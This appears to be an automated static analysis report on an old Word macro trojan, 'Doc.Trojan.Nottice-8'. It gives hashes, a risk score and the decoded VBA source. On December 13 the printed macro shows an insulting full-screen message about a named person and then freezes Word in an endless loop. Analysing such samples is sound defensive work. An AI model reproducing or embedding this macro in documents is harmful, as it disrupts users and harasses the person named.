Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0bb907865692ac32…

MALICIOUS

Office (OLE)

1.17 MB Created: 2001-07-20 07:18:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-18
MD5: 133d5974684013a41438ad6e5d80df70 SHA-1: eb550747735c1a6bf98092778d7c1abcb8c838b8 SHA-256: 0bb907865692ac32f29d22d68b673465f63b1e162a39049181c70753d26bb745
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE file containing VBA macros. The critical ClamAV heuristic indicates a known trojan, 'Doc.Trojan.Nottice-8'. The VBA macro code, when executed, attempts to display a large, attention-grabbing message and then enters an infinite loop. This behavior is consistent with malware designed to disrupt user interaction or potentially hide other malicious actions. No external network activity or file drops were observed in the static analysis.

Heuristics 1

  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 925 bytes
SHA-256: 01800a49a67327b149761aa7a0bf093e46f9cd4f680afe687aad2a56511df201
Detection
ClamAV: Doc.Trojan.Nottice-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WININIT"

Public Sub MAIN()
If WordBasic.Day(WordBasic.Now()) = 13 And WordBasic.Month(WordBasic.Now()) = 12 Then
    WordBasic.FileNew
    WordBasic.ToggleFull
    WordBasic.DocMaximize
    WordBasic.Font "Imprint MT Shadow"
    WordBasic.FontSize 60
    WordBasic.Bold
    WordBasic.Insert "IMPORTAT NOTTICE!"
    WordBasic.StartOfLine
    WordBasic.CharRight 1, 1
    WordBasic.FormatFont Points:="48", Color:=6
    WordBasic.EndOfLine
    WordBasic.InsertPara
    WordBasic.InsertPara
    WordBasic.FontSize 48
    WordBasic.Insert "HANSSI A. A. IS MARRIED WITH A LOSSER."
HangOn:
GoTo HangOn
End If
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True